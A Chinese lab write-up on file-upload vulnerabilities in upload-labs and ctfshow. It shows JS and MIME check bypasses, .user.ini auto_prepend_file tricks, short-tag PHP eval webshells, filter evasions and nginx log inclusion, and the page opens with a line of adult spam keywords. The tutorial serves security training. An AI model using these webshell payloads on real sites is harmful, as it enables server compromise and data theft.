国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性

這篇具有很好參考價值的文章主要介紹了day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

1.JS驗證

2.JS驗證+MIME?

3.JS驗證+.user.ini?

4.JS驗證+.user.ini+短標(biāo)簽 (ctfshow154,155關(guān))

5.JS驗證+.user.ini+短標(biāo)簽+過濾 [ ]

6.JS驗證+.user.ini+短標(biāo)簽+加過濾+文件頭


有關(guān)文件上傳的知識
1.為什么文件上傳存在漏洞
? ? ? ?上傳文件時,如果服務(wù)瑞代碼未對客戶端上傳的文件進(jìn)行嚴(yán)格的驗證和過濾,就容易造成可以上傳任意文件的情況,包括上傳腳本文件(asp、 aspx、php、 jsp等格式的文件)。
2.危害
? ? ? ?非法用戶可以利用上傳的惡意腳本文件控制整個網(wǎng)站,甚至控制服務(wù)器。這個惡意的腳本文件,又被稱為WebShell,也可將WebShell腳本稱為一種網(wǎng)頁后門,WebShell腳本具有非常強大的功能,比如查看服務(wù)器目錄、服務(wù)器中的文件,執(zhí)行系統(tǒng)命令等。

本文知識點:
1、文件上傳-前端驗證
2、文件上傳-黑白名單
3、文件上傳-user.in妙用
4、文件上傳-PHP語言特性

后門代碼需要特定后綴格式解析,不能以圖片后綴解析腳本后門代碼(解析漏洞除外),如:jpg圖片里面有php后門代碼,不能被觸發(fā),所以連接不上后門

本文將通過upload-labs靶場進(jìn)行演示說明,關(guān)于upload-labs靶場的搭建請參考這篇文章:https://blog.csdn.net/m0_69583059/article/details/135767303?spm=1001.2014.3001.5501

1.JS驗證

upload-labs靶場第一關(guān)

用哥斯拉生成一個php后門文件,打開哥斯拉點擊管理->生成,將生成的后門文件重命名為hm.php(方便演示)

關(guān)于哥斯拉的使用和安裝請參考這篇文章:哥斯拉安裝和使用

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

上傳png文件成功,上傳hm.php文件失敗

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

F12修改前端代碼

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

復(fù)制php文件路徑(http://localhost/upload-labs/upload/hm.php?),用哥斯拉嘗試連接

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端?day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

2.JS驗證+MIME?

upload-labs靶場第二關(guān)

這里直接F12修改后是沒有用的

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

通過抓包發(fā)現(xiàn)上傳png文件時和上傳php文件時,Content-Type的值不一樣

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端?day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

現(xiàn)在我們將上傳php文件時的Content-Type值修改為image/png,我們發(fā)現(xiàn)上傳成功

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端?day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

3.JS驗證+.user.ini?

user.ini:auto_prepend_file=hm.png
hm.png:<?php eval($_POST[x]);?>

后臺對文件后綴進(jìn)行限制,攔截php等相關(guān)后綴,導(dǎo)致后門代碼無法上傳,這里我們要用到.user.ini注意.user.ini的使用是有條件的,只適用于php,別的語言可能不支持,這里主要講解思路,語言不一樣,但思路都差不多,可以自己去了解一下,別的語言有沒有類似與.uer.ini文件這樣的功能。

.user.ini 文件是PHP的配置文件,用于自定義PHP的配置選項。該文件通常位于PHP安裝目錄的根目錄下,或者在特定的網(wǎng)站目錄下。.user.ini 文件是一個文本文件,可以使用任何文本編輯器進(jìn)行編輯。它包含了PHP的配置選項和值,每個選項和值都以等號(=)分隔。當(dāng)php再進(jìn)行掃描的時候會讀取到web目錄下的ini文件,從而進(jìn)行觸發(fā)。

在這個配置中存在兩個配置項:auto_append_file和auto_prepend_file

1.auto_prepend_file
auto_prepend_file表示在每個PHP腳本之前自動加載指定的文件。該文件的內(nèi)容將被插入到原始腳本的頂部。
2.auto_append_file
和auto_prepend_file類似,這個是指內(nèi)容添加到文末,如果有exit會無法調(diào)用到

upload-labs靶場第五關(guān)

源碼里把所有可以解析的后綴名都給寫死了,包括大小寫,轉(zhuǎn)換,空格,還有點號,正常的php類文件上傳不了了,并且拒絕上傳 .htaccess 文件。反復(fù)觀察發(fā)現(xiàn)沒有被限制的后綴名有 .php7 以及 .ini。現(xiàn)在我們該怎么辦呢,php文件不能上傳,那么我們能不能把后門代碼寫在png文件里面呢,這樣顯然是不行的,這樣會導(dǎo)致格式錯誤,這里我們就要用到php特有的.user.ini文件,上面已經(jīng)介紹過了,.user.ini的配置項auto_prepend_file表示在每個PHP腳本之前自動加載指定的文件,該文件的內(nèi)容將被插入到原始腳。這是什么意識呢,這里我解釋一下,也就是說我們?nèi)绻苯訉⒑箝T代碼寫在png文件下是不能上傳的,因為php文件被攔截了,所以這里我們要借auto_prepend_file,將png文件設(shè)定為指定文件,這樣png文件里面的后門代碼就會插入到原腳本(也就是和傳入文件同目錄的php文件,這里是readme.php), 這樣我們就成功將后門代碼植入到了php文件中,而index.php文件本來就是項目文件,這樣就可以通過index.php連接哥斯拉了。

現(xiàn)在我們創(chuàng)建一個.user.ini文件,在文件里寫入auto_prepend_file=hm.png。然后將我們生成的木馬文件hm.php改為hm.png,然后將這兩個文件上傳

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端

現(xiàn)在我們嘗試一下用readme.php連接哥斯拉

day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性,小迪安全-2022年,前端測試連接成功?

4.JS驗證+.user.ini+短標(biāo)簽 (ctfshow154,155關(guān))

user.ini:auto_prepend_file=text.png
text.png:<?=eval($_POST[pass]);?>

后臺對文件后綴以及短標(biāo)簽<?php進(jìn)行限制,這個時候不但要考慮php后綴文件不能上傳,還要考慮后門代碼不能出現(xiàn)<?php

這里有幾種替換短標(biāo)簽<?php的方法,效果是一樣的,一般用第二種和第四種,因為不需要前提條件

1.<?echo '123';?>? //前提是開啟配置參數(shù)short_open_tags=on

2.<?=(表達(dá)式)?>? ? //不需要開啟參數(shù)設(shè)置

將<?php eval($_POST[pass]);?>替換成<?=eval($_POST[pass]);?>

3.<% echo '123';%>? //前提是開啟了配置參數(shù)asp_tags=on

4.<script language="php">echo '1'</script> //不用修改參數(shù)開關(guān)

5.JS驗證+.user.ini+短標(biāo)簽+過濾 [ ]

過濾[],用{}替代(ctfshow156關(guān))

user.ini:auto_prepend_file=hm.png
hm.png:<?=eval($_POST{pass});?>

過濾了后門語句的分號;和php(ctfshow157關(guān))

zm.png:<?=system('tac ../fl*')?>? ??

過濾了;,php,() (ctfshow158,159關(guān))

zm.png:<?echo'tac /var/www/html/f*'?>

基本都過濾了(ctfshow160關(guān))

包含默認(rèn)日志,日志記錄UA頭,UA頭寫后門代碼

user.ini:auto_prepend_file=zm.png
zm.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>

6.JS驗證+.user.ini+短標(biāo)簽+加過濾+文件頭

文件頭部檢測是否為圖片格式文件(ctfshow161關(guān))文章來源地址http://www.zghlxwxcb.cn/news/detail-823783.html

user.ini:GIF89A?auto_prepend_file=zm.png
zm.png:GIF89A?<?=include"/var/lo"."g/nginx/access.lo"."g"?>

到了這里,關(guān)于day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • web攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值

    web攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值

    目錄 一、知識點概述 二、找回密碼過程中涉及到的安全問題 三、案例演示 驗證碼回顯 修改Response狀態(tài)值 驗證碼爆破 四、真實案例1 更改狀態(tài)值 驗證碼接口調(diào)用 五、真實案例2 用戶名重定向 六、安全修復(fù)方案 找回密碼邏輯機制 - 回顯 驗證碼 指向。 驗證碼驗證安全機制

    2024年02月04日
    瀏覽(55)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(WEB攻防-51-WEB攻防-通用漏洞&驗證碼識別&復(fù)用&調(diào)用&找回密碼重定向&狀態(tài)值)

    知識點: 1、找回密碼邏輯機制-回顯驗證碼指向 2、驗證碼驗證安全機制-爆破復(fù)用識別 3、找回密碼客戶端回顯Response狀態(tài)值修改重定向 4、驗證碼技術(shù)驗證碼爆破,驗證碼復(fù)用,驗證碼識別等 詳細(xì)點: 找回密碼流程安全: 1、用回顯狀態(tài)判斷-res前端判斷不安全 2、用用戶名重

    2024年01月16日
    瀏覽(34)
  • WEB攻防通用漏洞&跨域CORS資源&JSONP回調(diào)&域名接管劫持

    WEB攻防通用漏洞&跨域CORS資源&JSONP回調(diào)&域名接管劫持

    目錄 一、同源策略(SOC) 二、跨域資源(COSP) 三、回調(diào)跨域(JSOP) 四、CORS資源跨域-敏感頁面原碼獲取 五、JSONP 回調(diào)跨域-某牙個人信息泄露 六、子域名劫持接管 同源策略 (SOP)-“ 同源 ” 包括三個條件:同協(xié)議、同域名、同端口。 會檢測數(shù)據(jù)包的來源在哪里,進(jìn)而來判

    2024年02月01日
    瀏覽(32)
  • 35、WEB攻防——通用漏洞&XSS跨站&反射&存儲&DOM&盲打&劫持

    35、WEB攻防——通用漏洞&XSS跨站&反射&存儲&DOM&盲打&劫持

    XSS產(chǎn)生于前端的漏洞,常產(chǎn)生于: XSS分類: 反射型(非持久型) 存儲型(持久型),攻擊代碼被寫入數(shù)據(jù)庫中。常見于:寫日志、留言、評論的地方 DOM型 DOM型XSS與反射型XSS、存儲型XSS的最大區(qū)別在于:DOM型XSS前端的數(shù)據(jù)是傳輸給前端JS代碼進(jìn)行處理,而反射型XSS、存儲型

    2024年01月25日
    瀏覽(94)
  • 第52天:WEB攻防-通用漏洞&弱口令安全&社工字典生成&服務(wù)協(xié)議&Web應(yīng)用

    第52天:WEB攻防-通用漏洞&弱口令安全&社工字典生成&服務(wù)協(xié)議&Web應(yīng)用

    思維導(dǎo)圖 前置知識 案例一:Zblog-密文 MD5 傳輸加密猜解 案例二:服務(wù)類-SSHRDP 遠(yuǎn)程終端猜解 案例三:應(yīng)用類-ZIPWord 文件壓縮包猜解 案例四:github上收集的常見服務(wù)器設(shè)備,協(xié)議,以及常見平臺默認(rèn)密碼 產(chǎn)生原因: 安全意識:自己設(shè)置的xiaojie123弱密碼 初始化:初始密碼為

    2024年04月14日
    瀏覽(25)
  • 29、WEB攻防——通用漏洞&SQL注入&增刪改查&盲注&延遲&布爾&報錯

    29、WEB攻防——通用漏洞&SQL注入&增刪改查&盲注&延遲&布爾&報錯

    概念:在注入過程中,獲取的數(shù)據(jù)不能回顯至前端頁面,此時我們需要利用一些方法進(jìn)行判斷或嘗試,這個過程被稱為盲注。 解決:常規(guī)的聯(lián)合查詢注入不行的情況。 分類: 基于布爾的SQL盲注,邏輯判斷。 /blog/news.php?id=1 and if(1=1,sleep(5),0) 基于時間的SQL盲注,延時判斷。

    2024年01月20日
    瀏覽(116)
  • 小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL

    小迪安全25WEB 攻防-通用漏洞&SQL 讀寫注入&MYSQL&MSSQL&PostgreSQL

    ? ?#知識點:? 1、SQL 注入-MYSQL 數(shù)據(jù)庫? 2、SQL 注入-MSSQL(SQL server) 數(shù)據(jù)庫? 3、SQL 注入-PostgreSQL 數(shù)據(jù)庫? #詳細(xì)點:? Access 無高權(quán)限注入點-只能猜解,還是暴力猜解? ? ? ? ? ?因為access的數(shù)據(jù)庫是獨立存在的,不存在統(tǒng)一管理 對賬號密碼進(jìn)行猜解,此時只是獲取到后臺的操

    2024年02月20日
    瀏覽(25)
  • 28、web攻防——通用漏洞&SQL注入&HTTP頭XFF&COOKIE&POST請求

    28、web攻防——通用漏洞&SQL注入&HTTP頭XFF&COOKIE&POST請求

    $_GET :接收get請求,傳輸少量數(shù)據(jù),URL是有長度限制的; $_POST :接收post請求; $_COOKIE :接收cookie,用于身份驗證; $_REQUEST :收集通過 GET 、POST和COOKIE 方法發(fā)送的表單數(shù)據(jù); $_SERVER :接收數(shù)據(jù)包中的一些內(nèi)容,如瀏覽器信息、當(dāng)前訪問url地址等; 網(wǎng)站功能點: 后臺要記錄

    2024年01月19日
    瀏覽(22)
  • 小迪安全47WEB 攻防-通用漏洞&Java 反序列化&EXP 生成&數(shù)據(jù)提取&組件安全

    小迪安全47WEB 攻防-通用漏洞&Java 反序列化&EXP 生成&數(shù)據(jù)提取&組件安全

    # 知識點: 1 、 Java 反序列化演示 - 原生 API 接口 2 、 Java 反序列化漏洞利用 -Ysoserial 使用 3 、 Java 反序列化漏洞發(fā)現(xiàn)利用點 - 函數(shù) 數(shù)據(jù) 4 、 Java 反序列化考點 - 真實 CTF 賽題 - 審計分析 # 內(nèi)容點: 1 、明白 -Java 反序列化原理 2 、判斷 -Java 反序列化漏洞 3 、學(xué)會 -Ysoserial 工具

    2024年04月10日
    瀏覽(59)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&資源處理拒絕服務(wù))

    知識點: 1、CRLF注入-原理檢測利用 2、URL重定向-原理檢測利用 3、Web拒絕服務(wù)-原理檢測利用 #下節(jié)預(yù)告: 1、JSONPCORS跨域 2、域名安全接管劫持 #詳細(xì)點: 1.CRLF注入漏洞,是因為Wb應(yīng)用沒有對用戶輸入做嚴(yán)格驗證,導(dǎo)致攻擊者可以輸入一些 惡意字符。攻擊者一旦向清求行或首部

    2024年01月15日
    瀏覽(31)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包